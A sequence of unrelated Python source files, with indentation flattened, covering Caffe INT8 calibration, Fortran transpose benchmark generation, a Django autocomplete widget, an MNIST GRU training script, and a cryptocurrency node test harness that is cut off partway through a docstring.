# save into txt file
for data in save_temp:
calibration_file.write(data + "\n")
calibration_file.close()
# save calibration logs
save_temp_log = []
calibration_file_log = open(calibration_path + ".log", 'w')
for layer in quantize_layer_lists:
save_string = layer.name + ": value range 0 - " + str(layer.blob_max) \
+ ", interval " + str(layer.blob_distubution_interval) \
+ ", interval num " + str(INTERVAL_NUM) \
+ ", threshold num " + str(layer.blob_threshold) + "\n" \
+ str(layer.blob_distubution.astype(dtype=np.int64))
save_temp_log.append(save_string)
# save into txt file
for data in save_temp_log:
calibration_file_log.write(data + "\n")
def usage_info():
"""
usage info
"""
print("Input params is illegal...╮(╯3╰)╭")
print("try it again:\n python caffe-int8-scale-tools-dev.py -h")
def main():
"""
main function
"""
# time start
time_start = datetime.datetime.now()
print(args)
if args.proto == None or args.model == None or args.mean == None or args.images == None:
usage_info()
return None
# deploy caffe prototxt path
net_file = args.proto
# trained caffemodel path
caffe_model = args.model
# mean value
mean = args.mean
# norm value
norm = 1.0
if args.norm != 1.0:
norm = args.norm[0]
# calibration dataset
images_path = args.images
# the output calibration file
calibration_path = args.output
# enable the group scale
group_on = args.group
# default use CPU to forwark
if args.gpu != 0:
caffe.set_mode_gpu()
caffe.set_device(0)
# initial caffe net and the forword model(GPU or CPU)
net = caffe.Net(net_file,caffe_model,caffe.TEST)
# prepare the cnn network
transformer = network_prepare(net, mean, norm)
# get the calibration datasets images files path
images_files = file_name(images_path)
    # quantize kernel weights of the caffemodel to find its calibration table
weight_quantize(net, net_file, group_on)
# quantize activation value of the caffemodel to find it's calibration table
activation_quantize(net, transformer, images_files)
    # save the calibration tables; best wishes for low accuracy loss in your INT8 inference :)
save_calibration_file(calibration_path)
# time end
time_end = datetime.datetime.now()
print("\nCaffe Int8 Calibration table create success, it's cost %s, best wish for your INT8 inference has a low accuracy loss...\(^▽^)/...2333..." % (time_end - time_start))
if __name__ == "__main__":
main()
|
py | 1a344acbac7da3cb20ec59ab674fbe1c78a1dcc4 | #!/usr/bin/python
import fileinput
import string
import sys
import os
# BGP
#fortran_compiler = '/bgsys/drivers/ppcfloor/comm/bin/mpixlf77_r'
fortran_compiler = '/opt/ibmcmp/xlf/bg/11.1/bin/bgxlf_r'
fortran_opt_flags = '-O5 -qnoipa -qarch=450d -qtune=450 -qprefetch -qunroll=yes -qmaxmem=-1 -qextname -qalias=noaryovrlp:nopteovrlp -qreport=hotlist -c'
fortran_linker = '/bgsys/drivers/ppcfloor/comm/bin/mpixlf77_r'
fortran_link_flags = '-O3 -qnoipa -qarch=450d -qtune=450 -qunroll=no -qmaxmem=-1 -qextname'
#c_compiler = '/bgsys/drivers/ppcfloor/comm/bin/mpixlc_r'
c_compiler = '/opt/ibmcmp/vacpp/bg/9.0/bin/bgxlc_r'
c_opt_flags = '-O5 -qarch=450d -qtune=450 -qprefetch -qunroll=yes -qmaxmem=-1 -c'
hpm_lib = '-L/soft/apps/UPC/lib -lhpm'
src_dir = '/gpfs/home/jhammond/spaghetty/python/archive/src/'
lst_dir = '/gpfs/home/jhammond/spaghetty/python/archive/lst/'
exe_dir = '/gpfs/home/jhammond/spaghetty/python/archive/exe/'
lib_name = 'tce_sort_f77.a'
count = '100'
rank = '40'
ranks = [rank,rank,rank,rank]
size = int(ranks[0])*int(ranks[1])*int(ranks[2])*int(ranks[3])
sizechar = str(size)
def perm(l):
sz = len(l)
if sz <= 1:
return [l]
return [p[:i]+[l[0]]+p[i:] for i in xrange(sz) for p in perm(l[1:])]
indices = ['4','3','2','1']
#all_permutations = [indices]
#transpose_list = [indices]
#loop_list = [indices]
all_permutations = perm(indices)
transpose_list = perm(indices)
loop_list = perm(indices)
print fortran_compiler+' '+fortran_opt_flags+' -c tce_sort_hirata.F'
os.system(fortran_compiler+' '+fortran_opt_flags+' -c tce_sort_hirata.F')
os.system('ar -r '+lib_name+' tce_sort_hirata.o')
print fortran_compiler+' '+fortran_opt_flags+' -c glass_correct.F'
os.system(fortran_compiler+' '+fortran_opt_flags+' -c glass_correct.F')
os.system('ar -r '+lib_name+' glass_correct.o')
print c_compiler+' '+c_opt_flags+' -c tce_sort_4kg.c'
os.system(c_compiler+' '+c_opt_flags+' -c tce_sort_4kg.c')
os.system('ar -r '+lib_name+' tce_sort_4kg.o')
print c_compiler+' '+c_opt_flags+' -c tce_sort_4kg_4321.c'
os.system(c_compiler+' '+c_opt_flags+' -c tce_sort_4kg_4321.c')
os.system('ar -r '+lib_name+' tce_sort_4kg_4321.o')
print c_compiler+' '+c_opt_flags+' -c getticks_bgp.c'
os.system(c_compiler+' '+c_opt_flags+' -c getticks_bgp.c')
os.system('ar -r '+lib_name+' getticks_bgp.o')
timer = ''
if ( timer == "ticks" ):
timer_call = "getticks()"
else:
timer_call = "rtc()"
for transpose_order in transpose_list:
dummy = 0
A = transpose_order[0]
B = transpose_order[1]
C = transpose_order[2]
D = transpose_order[3]
for loop_order in loop_list:
dummy = dummy+1
a = loop_order[0]
b = loop_order[1]
c = loop_order[2]
d = loop_order[3]
driver_name = 'transpose_'+A+B+C+D+'_loop_'+a+b+c+d
subroutine_name = 'transpose_'+A+B+C+D+'_loop_'+a+b+c+d
print driver_name
source_name = driver_name+'_driver.F'
lst_name = driver_name+'_driver.lst'
source_file = open(source_name,'w')
source_file.write(' PROGRAM ARRAYTEST\n')
#source_file.write('#include "mpif.h"\n')
source_file.write(' REAL*8 before('+ranks[0]+','+ranks[0]+','+ranks[0]+','+ranks[0]+')\n')
source_file.write(' REAL*8 after_jeff('+sizechar+')\n')
source_file.write(' REAL*8 after_hirata('+sizechar+')\n')
source_file.write(' REAL*8 after_glass('+sizechar+')\n')
source_file.write(' REAL*8 factor\n')
if ( timer == "ticks" ):
source_file.write(' INTEGER*8 Tstart,Tfinish,Thirata,Tglass,Tjeff\n')
source_file.write(' INTEGER*8 Tbest\n')
else:
source_file.write(' REAL*8 Tstart,Tfinish,Thirata,Tglass,Tjeff\n')
source_file.write(' REAL*8 Tbest\n')
source_file.write(' REAL*8 Tspeedup\n')
source_file.write(' INTEGER*4 i,j,k,l\n')
source_file.write(' INTEGER*4 aSize(4)\n')
source_file.write(' INTEGER*4 perm(4)\n')
source_file.write(' INTEGER*4 fastest(4)\n')
source_file.write(' INTEGER ierror\n')
source_file.write(' LOGICAL glass_correct\n')
source_file.write(' EXTERNAL glass_correct\n')
source_file.write(' call mpi_init(ierror)\n')
source_file.write(' call hpm_init()\n')
source_file.write(' aSize(1) = '+ranks[0]+'\n')
source_file.write(' aSize(2) = '+ranks[1]+'\n')
source_file.write(' aSize(3) = '+ranks[2]+'\n')
source_file.write(' aSize(4) = '+ranks[3]+'\n')
source_file.write(' perm(1) = '+A+'\n')
source_file.write(' perm(2) = '+B+'\n')
source_file.write(' perm(3) = '+C+'\n')
source_file.write(' perm(4) = '+D+'\n')
source_file.write(' DO 70 i = 1, '+ranks[0]+'\n')
source_file.write(' DO 60 j = 1, '+ranks[1]+'\n')
source_file.write(' DO 50 k = 1, '+ranks[2]+'\n')
source_file.write(' DO 40 l = 1, '+ranks[3]+'\n')
source_file.write(' before(i,j,k,l) = l + k*10 + j*100 + i*1000\n')
source_file.write('40 CONTINUE\n')
source_file.write('50 CONTINUE\n')
source_file.write('60 CONTINUE\n')
source_file.write('70 CONTINUE\n')
source_file.write(' factor = 1.0\n')
if ( timer == "ticks" ):
source_file.write(' Tbest=999999\n')
source_file.write(' Tstart=0\n')
source_file.write(' Tfinish=0\n')
else:
source_file.write(' Tbest=999999.0d0\n')
source_file.write(' Tstart=0.0d0\n')
source_file.write(' Tfinish=0.0d0\n')
source_file.write(' call hpm_start("tce_sort_4")\n')
source_file.write(' Tstart='+timer_call+'\n')
source_file.write(' DO 30 i = 1, '+count+'\n')
source_file.write(' CALL tce_sort_4(before, after_hirata,\n')
source_file.write(' & aSize(1), aSize(2), aSize(3), aSize(4),\n')
source_file.write(' & perm(1), perm(2), perm(3), perm(4), factor)\n')
source_file.write('30 CONTINUE\n')
source_file.write(' Tfinish='+timer_call+'\n')
source_file.write(' call hpm_stop("tce_sort_4")\n')
source_file.write(' Thirata=(Tfinish-Tstart)\n')
if ( timer == "ticks" ):
source_file.write(' Tstart=0\n')
source_file.write(' Tfinish=0\n')
else:
source_file.write(' Tstart=0.0\n')
source_file.write(' Tfinish=0.0\n')
source_file.write(' IF( ((perm(1).eq.4).and.(perm(2).eq.3)).and.\n')
source_file.write(' & ((perm(3).eq.2).and.(perm(4).eq.1)) ) THEN\n')
source_file.write(' call hpm_start("tce_sort_4kg_4321_")\n')
source_file.write(' Tstart='+timer_call+'\n')
source_file.write(' DO 31 i = 1, '+count+'\n')
source_file.write(' CALL tce_sort_4kg_4321_(before, after_glass,\n')
source_file.write(' & aSize(1), aSize(2), aSize(3), aSize(4),\n')
source_file.write(' & factor)\n')
source_file.write('31 CONTINUE\n')
source_file.write(' Tfinish='+timer_call+'\n')
source_file.write(' call hpm_stop("tce_sort_4kg_4321_")\n')
source_file.write(' ELSEIF(glass_correct(perm(1), perm(2), perm(3), perm(4))) THEN\n')
source_file.write(' call hpm_start("tce_sort_4kg_")\n')
source_file.write(' Tstart='+timer_call+'\n')
source_file.write(' DO 32 i = 1, '+count+'\n')
source_file.write(' CALL tce_sort_4kg_(before, after_glass,\n')
source_file.write(' & aSize(1), aSize(2), aSize(3), aSize(4),\n')
source_file.write(' & perm(1), perm(2), perm(3), perm(4), factor)\n')
source_file.write('32 CONTINUE\n')
source_file.write(' Tfinish='+timer_call+'\n')
source_file.write(' call hpm_stop("tce_sort_4kg_")\n')
source_file.write(' ENDIF\n')
source_file.write(' Tglass=(Tfinish-Tstart)\n')
source_file.write(' IF(glass_correct(perm(1), perm(2), perm(3), perm(4))) THEN\n')
source_file.write(' PRINT*," i after_glass(i)\n')
source_file.write(' & after_hirata(i)"\n')
source_file.write(' DO 33 i = 1, '+sizechar+'\n')
source_file.write(' IF (after_glass(i).ne.after_hirata(i)) THEN\n')
source_file.write(' PRINT*,"glass error ",i,after_glass(i),after_hirata(i)\n')
source_file.write(' ENDIF\n')
source_file.write('33 CONTINUE\n')
source_file.write(' ENDIF\n')
source_file.write(' write(6,*) "TESTING TRANPOSE TYPE '+A+B+C+D+'"\n')
source_file.write(' write(6,*) "==================="\n')
source_file.write(' write(6,*) "The compilation flags were:"\n')
for option in range(0,len(fortran_opt_flags.split())):
source_file.write(' write(6,*) "'+fortran_opt_flags.split()[option]+'"\n')
source_file.write(' write(6,*) "==================="\n')
source_file.write(' write(6,*) "Hirata Reference = ",Thirata,"seconds"\n')
source_file.write(' IF(glass_correct(perm(1), perm(2), perm(3), perm(4))) THEN\n')
source_file.write(' write(6,*) "KGlass Reference = ",Tglass,"seconds"\n')
source_file.write(' ENDIF\n')
source_file.write(' write(6,1001) "Algorithm","Jeff","Speedup","Best","Best Speedup"\n')
if ( timer == "ticks" ):
source_file.write(' Tstart=0\n')
source_file.write(' Tfinish=0\n')
else:
source_file.write(' Tstart=0.0\n')
source_file.write(' Tfinish=0.0\n')
source_file.write(' call hpm_start("'+subroutine_name+'")\n')
source_file.write(' Tstart='+timer_call+'\n')
source_file.write(' DO '+str(100+dummy)+' i = 1, '+count+'\n')
source_file.write(' CALL '+subroutine_name+'(before, after_jeff,\n')
source_file.write(' & aSize(1), aSize(2), aSize(3), aSize(4),\n')
source_file.write(' & factor)\n')
source_file.write(str(100+dummy)+' CONTINUE\n')
source_file.write(' Tfinish='+timer_call+'\n')
source_file.write(' call hpm_stop("'+subroutine_name+'")\n')
source_file.write(' Tjeff=(Tfinish-Tstart)\n')
source_file.write(' Tspeedup=(1d0*Thirata)/(1d0*Tjeff)\n')
source_file.write(' if (Tjeff<Tbest) then\n')
source_file.write(' Tbest=Tjeff\n')
source_file.write(' fastest(1)='+a+'\n')
source_file.write(' fastest(2)='+b+'\n')
source_file.write(' fastest(3)='+c+'\n')
source_file.write(' fastest(4)='+d+'\n')
source_file.write(' endif\n')
if 0 < dummy < 10:
nice_dummy=' '+str(dummy)
if 9 < dummy < 100:
nice_dummy=' '+str(dummy)
if 99 < dummy < 999:
nice_dummy=''+str(dummy)
#source_file.write(' write(6,1100) "'+nice_dummy+' Loop '+a+b+c+d+' ",\n')
#source_file.write(' & Tjeff,Tspeedup,Tbest,Thirata/Tbest\n')
source_file.write(' write(6,*) "'+nice_dummy+' Loop '+a+b+c+d+' ",\n')
source_file.write(' & Tjeff,Tspeedup,Tbest,Thirata/Tbest\n')
source_file.write(' DO '+str(500+dummy)+' i = 1, '+sizechar+'\n')
source_file.write(' IF (after_jeff(i).ne.after_hirata(i)) THEN\n')
source_file.write(' PRINT*,"jeff error ",i,after_jeff(i),after_hirata(i)\n')
source_file.write(' ENDIF\n')
source_file.write(str(500+dummy)+' CONTINUE\n')
source_file.write(' write(6,1020) "The best loop order is:",\n')
source_file.write(' & fastest(1),fastest(2),fastest(3),fastest(4)\n')
#source_file.write(' write(6,1030) "The best time is:",Tbest\n')
source_file.write(' write(6,*) "The best time is:",Tbest\n')
#source_file.write(' write(6,1030) "The best speedup is:",(1d0*Thirata)/(1d0*Tbest)\n')
source_file.write(' write(6,*) "The best speedup is:",(1d0*Thirata)/(1d0*Tbest)\n')
source_file.write(' call hpm_print()\n')
source_file.write(' call hpm_print_flops()\n')
source_file.write(' call hpm_print_flops_agg()\n')
source_file.write(' call mpi_finalize(ierror)\n')
source_file.write(' STOP\n')
source_file.write(' 1001 format(1x,a13,a12,a15,a9,a18)\n')
source_file.write(' 1020 format(1x,a30,8x,4i1)\n')
source_file.write('! 1030 format(1x,a30,d18.12)\n')
source_file.write('! 1100 format(1x,a16,4i18)\n')
source_file.write(' 911 continue\n')
source_file.write(' END\n')
source_file.close()
print fortran_linker+' '+fortran_link_flags+' '+' '+source_name+' '+lib_name+' '+' -o '+exe_dir+driver_name+'.x'
os.system(fortran_linker+' '+fortran_link_flags+' '+' '+source_name+' '+lib_name+' '+hpm_lib+' -o '+exe_dir+driver_name+'.x')
os.system('mv '+source_name+' '+src_dir)
#os.system('mv '+lst_name+' '+lst_dir)
|
py | 1a344b2813f21aa6406e608999919c9cc20ed5f7 | # -*- coding: utf-8 -*-
import six
from six.moves import urllib
from django import forms
from django.contrib.admin.sites import site
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
try:
from django.templatetags import static
except ImportError:
# compatibility with django < 2.1
from django.contrib.admin.templatetags.admin_static import static
try:
from django.urls import reverse
except ImportError:
from django.core.urlresolvers import reverse
from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from django.utils.text import Truncator
class ForeignKeySearchInput(ForeignKeyRawIdWidget):
"""
Widget for displaying ForeignKeys in an autocomplete search input
    instead of in a <select> box.
"""
# Set in subclass to render the widget with a different template
widget_template = None
    # Set this to the path of the search view
search_path = None
def _media(self):
js_files = [
static('django_extensions/js/jquery.bgiframe.js'),
static('django_extensions/js/jquery.ajaxQueue.js'),
static('django_extensions/js/jquery.autocomplete.js'),
]
return forms.Media(
css={'all': (static('django_extensions/css/jquery.autocomplete.css'), )},
js=js_files,
)
media = property(_media)
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.model._default_manager.get(**{key: value})
return Truncator(obj).words(14, truncate='...')
def __init__(self, rel, search_fields, attrs=None):
self.search_fields = search_fields
super(ForeignKeySearchInput, self).__init__(rel, site, attrs)
def render(self, name, value, attrs=None, renderer=None):
if attrs is None:
attrs = {}
opts = self.rel.model._meta
app_label = opts.app_label
model_name = opts.object_name.lower()
related_url = reverse('admin:%s_%s_changelist' % (app_label, model_name))
if not self.search_path:
self.search_path = urllib.parse.urljoin(related_url, 'foreignkey_autocomplete/')
params = self.url_parameters()
if params:
url = '?' + '&'.join(['%s=%s' % (k, v) for k, v in params.items()])
else:
url = ''
if 'class' not in attrs:
attrs['class'] = 'vForeignKeyRawIdAdminField'
# Call the TextInput render method directly to have more control
output = [forms.TextInput.render(self, name, value, attrs)]
if value:
label = self.label_for_value(value)
else:
label = six.u('')
context = {
'url': url,
'related_url': related_url,
'search_path': self.search_path,
'search_fields': ','.join(self.search_fields),
'app_label': app_label,
'model_name': model_name,
'label': label,
'name': name,
}
output.append(render_to_string(self.widget_template or (
'django_extensions/widgets/%s/%s/foreignkey_searchinput.html' % (app_label, model_name),
'django_extensions/widgets/%s/foreignkey_searchinput.html' % app_label,
'django_extensions/widgets/foreignkey_searchinput.html',
), context))
output.reverse()
return mark_safe(six.u('').join(output))
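# Hypothetical usage sketch (the Book/author names and search fields are
# assumptions, not part of this module): override the form field for a
# ForeignKey in a ModelAdmin so it renders with this autocomplete widget.
#
#     from django.contrib import admin
#
#     class BookAdmin(admin.ModelAdmin):
#         def formfield_for_dbfield(self, db_field, request, **kwargs):
#             if db_field.name == 'author':
#                 kwargs['widget'] = ForeignKeySearchInput(
#                     db_field.remote_field, search_fields=('name',))
#             return super(BookAdmin, self).formfield_for_dbfield(
#                 db_field, request, **kwargs)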
|
py | 1a344bedd3b9e95587abe6a3ff684e4c6f09e529 | import torch
import torch.nn as nn
import torchvision.datasets as dsets
import torchvision.transforms as transforms
from torch.autograd import Variable
from modules import MGRU
torch.manual_seed(1111)
# Hyper Parameters
sequence_length = 28
input_size = 28
hidden_size = 128
num_layers = 2
num_classes = 10
batch_size = 100
num_epochs = 2
learning_rate = 0.01
# MNIST Dataset
train_dataset = dsets.MNIST(root='../data/',
train=True,
transform=transforms.ToTensor(),
download=True)
test_dataset = dsets.MNIST(root='../data/',
train=False,
transform=transforms.ToTensor())
# Data Loader (Input Pipeline)
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=batch_size,
shuffle=True)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
batch_size=batch_size,
shuffle=False)
# RNN Model (Many-to-One)
class RNNModel(nn.Module):
def __init__(self, input_size, hidden_size, num_layers, num_classes, bias=True, grad_clip=None):
super(RNNModel, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
self.rnn = MGRU(input_size, hidden_size, num_layers=num_layers,
bias=bias, return_sequences=False, grad_clip=grad_clip)
self.fc = nn.Linear(hidden_size, num_classes, bias=bias)
def forward(self, x):
# Set initial states
initial_states = [Variable(torch.zeros(x.size(0), self.hidden_size)) for _ in range(self.num_layers)]
# Forward propagate RNN
out = self.rnn(x, initial_states)
# Decode hidden state of last time step
out = self.fc(out)
return out
rnn = RNNModel(input_size, hidden_size, num_layers, num_classes, bias=True, grad_clip=10)
# Loss and Optimizer
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)
# Train the Model
for epoch in range(num_epochs):
for i, (images, labels) in enumerate(train_loader):
images = Variable(images.view(-1, sequence_length, input_size))
labels = Variable(labels)
# Forward + Backward + Optimize
optimizer.zero_grad()
outputs = rnn(images)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
if (i+1) % 100 == 0:
print ('Epoch [%d/%d], Step [%d/%d], Loss: %.4f'
%(epoch+1, num_epochs, i+1, len(train_dataset)//batch_size, loss.data[0]))
# Test the Model
correct = 0
total = 0
for images, labels in test_loader:
images = Variable(images.view(-1, sequence_length, input_size))
outputs = rnn(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum()
print('Test Accuracy of the model on the 10000 test images: %d %%' % (100 * correct / total))
# Save the Model
torch.save(rnn.state_dict(), 'mgru.pkl')
|
py | 1a344c0cdeb0feaf42b25cb184d6fda583b1d69f | #!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Class for merelcoind node under test"""
import contextlib
import decimal
import errno
from enum import Enum
import http.client
import json
import logging
import os
import re
import subprocess
import tempfile
import time
import urllib.parse
from .authproxy import JSONRPCException
from .util import (
append_config,
delete_cookie_file,
get_rpc_proxy,
rpc_url,
wait_until,
p2p_port,
)
# For Python 3.4 compatibility
JSONDecodeError = getattr(json, "JSONDecodeError", ValueError)
BITCOIND_PROC_WAIT_TIMEOUT = 60
class FailedToStartError(Exception):
"""Raised when a node fails to start correctly."""
class ErrorMatch(Enum):
FULL_TEXT = 1
FULL_REGEX = 2
PARTIAL_REGEX = 3
class TestNode():
"""A class for representing a merelcoind node under test.
This class contains:
- state about the node (whether it's running, etc)
- a Python subprocess.Popen object representing the running process
- an RPC connection to the node
- one or more P2P connections to the node
To make things easier for the test writer, any unrecognised messages will
be dispatched to the RPC connection."""
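    # Illustration of the dispatch described above (names of RPCs are examples):
    # an attribute TestNode does not define itself, e.g. `node.getblockcount()`,
    # is forwarded by __getattr__ below to the RPC proxy (or to merelcoin-cli
    # when use_cli=True), so tests can call any RPC as if it were a method.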
def __init__(self, i, datadir, *, rpchost, timewait, bitcoind, bitcoin_cli, mocktime, coverage_dir, extra_conf=None, extra_args=None, use_cli=False):
self.index = i
self.datadir = datadir
self.stdout_dir = os.path.join(self.datadir, "stdout")
self.stderr_dir = os.path.join(self.datadir, "stderr")
self.rpchost = rpchost
self.rpc_timeout = timewait
self.binary = bitcoind
self.coverage_dir = coverage_dir
        if extra_conf is not None:
append_config(datadir, extra_conf)
# Most callers will just need to add extra args to the standard list below.
# For those callers that need more flexibility, they can just set the args property directly.
# Note that common args are set in the config file (see initialize_datadir)
self.extra_args = extra_args
self.args = [
self.binary,
"-datadir=" + self.datadir,
"-logtimemicros",
"-debug",
"-debugexclude=libevent",
"-debugexclude=leveldb",
"-mocktime=" + str(mocktime),
"-uacomment=testnode%d" % i
]
self.cli = TestNodeCLI(bitcoin_cli, self.datadir)
self.use_cli = use_cli
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.url = None
self.log = logging.getLogger('TestFramework.node%d' % i)
self.cleanup_on_exit = True # Whether to kill the node when this object goes away
self.p2ps = []
def get_deterministic_priv_key(self):
"""Return a deterministic priv key in base58, that only depends on the node's index"""
PRIV_KEYS = [
            # address, privkey
('mjTkW3DjgyZck4KbiRusZsqTgaYTxdSz6z', 'cVpF924EspNh8KjYsfhgY96mmxvT6DgdWiTYMtMjuM74hJaU5psW'),
('msX6jQXvxiNhx3Q62PKeLPrhrqZQdSimTg', 'cUxsWyKyZ9MAQTaAhUQWJmBbSvHMwSmuv59KgxQV7oZQU3PXN3KE'),
('mnonCMyH9TmAsSj3M59DsbH8H63U3RKoFP', 'cTrh7dkEAeJd6b3MRX9bZK8eRmNqVCMH3LSUkE3dSFDyzjU38QxK'),
('mqJupas8Dt2uestQDvV2NH3RU8uZh2dqQR', 'cVuKKa7gbehEQvVq717hYcbE9Dqmq7KEBKqWgWrYBa2CKKrhtRim'),
('msYac7Rvd5ywm6pEmkjyxhbCDKqWsVeYws', 'cQDCBuKcjanpXDpCqacNSjYfxeQj8G6CAtH1Dsk3cXyqLNC4RPuh'),
('n2rnuUnwLgXqf9kk2kjvVm8R5BZK1yxQBi', 'cQakmfPSLSqKHyMFGwAqKHgWUiofJCagVGhiB4KCainaeCSxeyYq'),
('myzuPxRwsf3vvGzEuzPfK9Nf2RfwauwYe6', 'cQMpDLJwA8DBe9NcQbdoSb1BhmFxVjWD5gRyrLZCtpuF9Zi3a9RK'),
('mumwTaMtbxEPUswmLBBN3vM9oGRtGBrys8', 'cSXmRKXVcoouhNNVpcNKFfxsTsToY5pvB9DVsFksF1ENunTzRKsy'),
('mpV7aGShMkJCZgbW7F6iZgrvuPHjZjH9qg', 'cSoXt6tm3pqy43UMabY6eUTmR3eSUYFtB2iNQDGgb3VUnRsQys2k'),
]
return PRIV_KEYS[self.index]
def _node_msg(self, msg: str) -> str:
"""Return a modified msg that identifies this node by its index as a debugging aid."""
return "[node %d] %s" % (self.index, msg)
def _raise_assertion_error(self, msg: str):
"""Raise an AssertionError with msg modified to identify this node."""
raise AssertionError(self._node_msg(msg))
def __del__(self):
# Ensure that we don't leave any bitcoind processes lying around after
# the test ends
if self.process and self.cleanup_on_exit:
# Should only happen on test failure
# Avoid using logger, as that may have already been shutdown when
# this destructor is called.
print(self._node_msg("Cleaning up leftover process"))
self.process.kill()
def __getattr__(self, name):
"""Dispatches any unrecognised messages to the RPC connection or a CLI instance."""
if self.use_cli:
return getattr(self.cli, name)
else:
assert self.rpc_connected and self.rpc is not None, self._node_msg("Error: no RPC connection")
return getattr(self.rpc, name)
def start(self, extra_args=None, *, stdout=None, stderr=None, **kwargs):
"""Start the node."""
if extra_args is None:
extra_args = self.extra_args
# Add a new stdout and stderr file each time bitcoind is started
if stderr is None:
stderr = tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False)
if stdout is None:
stdout = tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False)
self.stderr = stderr
self.stdout = stdout
# Delete any existing cookie file -- if such a file exists (eg due to
# unclean shutdown), it will get overwritten anyway by bitcoind, and
# potentially interfere with our attempt to authenticate
delete_cookie_file(self.datadir)
# add environment variable LIBC_FATAL_STDERR_=1 so that libc errors are written to stderr and not the terminal
subp_env = dict(os.environ, LIBC_FATAL_STDERR_="1")
self.process = subprocess.Popen(self.args + extra_args, env=subp_env, stdout=stdout, stderr=stderr, **kwargs)
self.running = True
self.log.debug("merelcoind started, waiting for RPC to come up")
def wait_for_rpc_connection(self):
"""Sets up an RPC connection to the merelcoind process. Returns False if unable to connect."""
# Poll at a rate of four times per second
poll_per_s = 4
for _ in range(poll_per_s * self.rpc_timeout):
if self.process.poll() is not None:
raise FailedToStartError(self._node_msg(
'merelcoind exited with status {} during initialization'.format(self.process.returncode)))
try:
self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)
self.rpc.getblockcount()
# If the call to getblockcount() succeeds then the RPC connection is up
self.rpc_connected = True
self.url = self.rpc.url
self.log.debug("RPC successfully started")
return
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
if e.error['code'] != -28: # RPC in warmup?
raise # unknown JSON RPC exception
            except ValueError as e:  # cookie file not found and no rpcuser or rpcpassword. bitcoind still starting
if "No RPC credentials" not in str(e):
raise
time.sleep(1.0 / poll_per_s)
self._raise_assertion_error("Unable to connect to merelcoind")
def get_wallet_rpc(self, wallet_name):
if self.use_cli:
return self.cli("-rpcwallet={}".format(wallet_name))
else:
assert self.rpc_connected and self.rpc, self._node_msg("RPC not connected")
wallet_path = "wallet/{}".format(urllib.parse.quote(wallet_name))
return self.rpc / wallet_path
def stop_node(self, expected_stderr=''):
"""Stop the node."""
if not self.running:
return
self.log.debug("Stopping node")
try:
self.stop()
except http.client.CannotSendRequest:
self.log.exception("Unable to stop node.")
# Check that stderr is as expected
self.stderr.seek(0)
stderr = self.stderr.read().decode('utf-8').strip()
if stderr != expected_stderr:
raise AssertionError("Unexpected stderr {} != {}".format(stderr, expected_stderr))
self.stdout.close()
self.stderr.close()
del self.p2ps[:]
def is_node_stopped(self):
"""Checks whether the node has stopped.
Returns True if the node has stopped. False otherwise.
This method is responsible for freeing resources (self.process)."""
if not self.running:
return True
return_code = self.process.poll()
if return_code is None:
return False
# process has stopped. Assert that it didn't return an error code.
assert return_code == 0, self._node_msg(
"Node returned non-zero exit code (%d) when stopping" % return_code)
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.log.debug("Node stopped")
return True
def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):
wait_until(self.is_node_stopped, timeout=timeout)
@contextlib.contextmanager
def assert_debug_log(self, expected_msgs):
debug_log = os.path.join(self.datadir, 'regtest', 'debug.log')
with open(debug_log, encoding='utf-8') as dl:
dl.seek(0, 2)
prev_size = dl.tell()
try:
yield
finally:
with open(debug_log, encoding='utf-8') as dl:
dl.seek(prev_size)
log = dl.read()
print_log = " - " + "\n - ".join(log.splitlines())
for expected_msg in expected_msgs:
if re.search(re.escape(expected_msg), log, flags=re.MULTILINE) is None:
self._raise_assertion_error('Expected message "{}" does not partially match log:\n\n{}\n\n'.format(expected_msg, print_log))
def assert_start_raises_init_error(self, extra_args=None, expected_msg=None, match=ErrorMatch.FULL_TEXT, *args, **kwargs):
"""Attempt to start the node and expect it to raise an error.
extra_args: extra arguments to pass through to merelcoind
expected_msg: regex that stderr should match when merelcoind fails
Will throw if merelcoind starts without an error.
        Will throw if an expected_msg is provided and it does not match merelcoind's stderr."""
with tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False) as log_stderr, \
tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False) as log_stdout:
try:
self.start(extra_args, stdout=log_stdout, stderr=log_stderr, *args, **kwargs)
self.wait_for_rpc_connection()
self.stop_node()
self.wait_until_stopped()
except FailedToStartError as e:
self.log.debug('merelcoind failed to start: %s', e)
self.running = False
self.process = None
# Check stderr for expected message
if expected_msg is not None:
log_stderr.seek(0)
stderr = log_stderr.read().decode('utf-8').strip()
if match == ErrorMatch.PARTIAL_REGEX:
if re.search(expected_msg, stderr, flags=re.MULTILINE) is None:
self._raise_assertion_error(
'Expected message "{}" does not partially match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_REGEX:
if re.fullmatch(expected_msg, stderr) is None:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_TEXT:
if expected_msg != stderr:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
else:
if expected_msg is None:
assert_msg = "merelcoind should have exited with an error"
else:
assert_msg = "merelcoind should have exited with expected error " + expected_msg
self._raise_assertion_error(assert_msg)
def node_encrypt_wallet(self, passphrase):
""""Encrypts the wallet.
This causes merelcoind to shutdown, so this method takes
